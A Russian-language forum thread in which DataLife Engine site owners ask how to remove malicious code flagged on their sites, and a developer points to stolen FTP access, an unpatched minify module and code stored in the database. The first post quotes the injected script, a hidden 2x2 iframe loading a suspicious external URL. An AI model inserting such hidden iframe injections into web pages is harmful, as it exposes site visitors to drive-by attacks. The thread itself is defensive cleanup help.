RACEDEMON 3 Опубликовано: 11 июля 2012 Рассказать Опубликовано: 11 июля 2012 Вы проверяли сайт: http://uroboros-team.ru/ На сайте обнаружен вирус! На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код. Одну вставку нашел и удалил, вторую не получается. Она расположена в самом низу. Большая просьба сказать мне, где Я могу найти кусок этого кода и удалить. PS: Как и кто вставил этот код в скрип - загадка.В файле mail.tpl, этого нет, хотя показывает, что именно там... </body> </html> <!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) --> <script type="text/javascript"> document.write('<iframe src="http://flipsphere.ru/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script> Пока дождешься... Сайт снести легче. Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 11 июля 2012 Рассказать Опубликовано: 11 июля 2012 http://dle-news.ru/info/1508-otpusk.html Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 995 Опубликовано: 12 июля 2012 Рассказать Опубликовано: 12 июля 2012 RACEDEMON, Он у вас прописан в index.php в самом низу. На данный файл нет и не должно быть прав на запись со стороны скриптов. Скорее всего у вас был украден FTP или root доступ к серверу. Как воруются доступы и какие меры предпринять вы можете прочитать в темах на форуме http://forum.dle-news.ru/index.php?s=&showtopic=39386&view=findpost&p=175979 http://forum.dle-news.ru/index.php?showtopic=32928&hl=iframe Там подробно описано как могут вороваться FTP доступы и как от этого защитится. Проверяйте свой компьютер на вирусы, меняйте все пароли, в том числе и по FTP и к БД. Установите ограничение по IP на доступ по FTP. Цитата Ссылка на сообщение Поделиться на других сайтах
Леопард 2 Опубликовано: 18 сентября 2013 Рассказать Опубликовано: 18 сентября 2013 sakhfguz.ru Поведенческий анализ Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей. Последний раз изменял slider.tpl sidebar.tpl main.tpl Но там все чисто Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 995 Опубликовано: 18 сентября 2013 Рассказать Опубликовано: 18 сентября 2013 Леопард, У вас не был установлен патч http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html Ставьте патч, меняйте пароль к БД, как удалять код написано на странице http://forum.dle-news.ru/index.php?showtopic=64224&st=20 Цитата Ссылка на сообщение Поделиться на других сайтах
Леопард 2 Опубликовано: 18 сентября 2013 Рассказать Опубликовано: 18 сентября 2013 (изменено) Леопард, У вас не был установлен патч http://dle-news.ru/b...ule-minify.html Ставьте патч, меняйте пароль к БД, как удалять код написано на странице http://forum.dle-new...pic=64224&st=20 ./engine/cache/system/minify_dbconfig.php.js_b1526ad0e90068d67e8a80625a8fa29d.gz 170 b 01.09.2013 13:10:04 неизвестен дистрибутиву ./engine/cache/system/minify_dbconfig.php.js_b1526ad0e90068d67e8a80625a8fa29d 285 b 01.09.2013 13:10:04 неизвестен дистрибутe Это удалить? Изменено 18 сентября 2013 пользователем Леопард Цитата Ссылка на сообщение Поделиться на других сайтах
Dj Dance 185 Опубликовано: 18 сентября 2013 Рассказать Опубликовано: 18 сентября 2013 Это удалить? Можно спокойно удалять. Цитата Ссылка на сообщение Поделиться на других сайтах
Леопард 2 Опубликовано: 18 сентября 2013 Рассказать Опубликовано: 18 сентября 2013 Это удалить? Можно спокойно удалять. Удалил все равно показывает вирус, Что делать?Я правильно заплатку поставил? <?php if (isset($_GET['f'])) { $_GET['f'] = str_replace(chr(0), '', (string)$_GET['f']); } /** * Front controller for default Minify implementation * * DO NOT EDIT! Configure this utility via config.php and groupsConfig.php * * @package Minify */ define('MINIFY_MIN_DIR', dirname(__FILE__)); // load config require MINIFY_MIN_DIR . '/config.php'; // setup include path Вот что я нашел в /public_html/engine/editor/scripts/webfont.js var arrSysFonts = ["impact", "palatino linotype", "tahoma", "century gothic", "lucida sans unicode", "times new roman", "arial narrow", "verdana", "copperplate gothic light", "lucida console", "gill sans mt", "trebuchet ms", "courier new", "arial", "georgia", "garamond", "arial black", "bookman old style", "courier", "helvetica"]; УдалилЗаменил webfont.js из дистрибьютива Цитата Ссылка на сообщение Поделиться на других сайтах
Леопард 2 Опубликовано: 19 сентября 2013 Рассказать Опубликовано: 19 сентября 2013 Дата проверки: 19/09/2013 04:38:38 Тип проверки: полная (antivirus-alarm + мировые антивирусные базы) Список проверяемых файлов: 1. http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js, тип файла: javascript • содержит сомнительную ссылку по версии гугла: ajax.googleapis.com 2. http://sakhfguz.ru/engine/editor/scripts/webfont.js, тип файла: javascript • содержит сомнительную ссылку по версии гугла: ajax.googleapis.com • содержит сомнительную ссылку по версии гугла: fonts.googleapis.com 3. http://sakhfguz.ru/templates/Pisces/js/libs.js, тип файла: javascript 4. http://sakhfguz.ru/templates/Pisces/js/slides.js, тип файла: javascript 5. http://sakhfguz.ru/engine/classes/min/index.php?charset=windows-1251&g=general&9, тип файла: javascript • содержит сомнительную ссылку по версии гугла: ajax.googleapis.com • содержит сомнительную ссылку по версии гугла: fonts.googleapis.com • содержит сомнительную ссылку по версии гугла: yandex.ru • содержит сомнительную ссылку по версии гугла: www.liveinternet.ru 6. http://sakhfguz.ru, тип файла: html • содержит сомнительную ссылку по версии гугла: ajax.googleapis.com • содержит сомнительную ссылку по версии гугла: fonts.googleapis.com • содержит сомнительную ссылку по версии гугла: yandex.ru • содержит сомнительную ссылку по версии гугла: www.liveinternet.ruНе получется удалить, поставил код <?php /** * Front controller for default Minify implementation * * DO NOT EDIT! Configure this utility via config.php and groupsConfig.php * * @package Minify */ if (isset($_GET['f'])) { $_GET['f'] = str_replace(chr(0), '', (string)$_GET['f']); } define('MINIFY_MIN_DIR', dirname(__FILE__)); // load config require MINIFY_MIN_DIR . '/config.php'; // setup include path set_include_path($min_libPath . PATH_SEPARATOR . get_include_path()); require 'Minify.php'; Minify::$uploaderHoursBehind = $min_uploaderHoursBehind; Minify::setCache( isset($min_cachePath) ? $min_cachePath : '' ,$min_cacheFileLocking Пароль к БД сменил А вредоносный код удалить не получается Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 995 Опубликовано: 19 сентября 2013 Рассказать Опубликовано: 19 сентября 2013 Леопард, Смотрите внимательно по ссылке что я вам дал http://forum.dle-news.ru/index.php?showtopic=64224&st=20 этот код у вас в БД, и удалять нужно его из БД, а не из файлов. У вас нет его в файлах Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.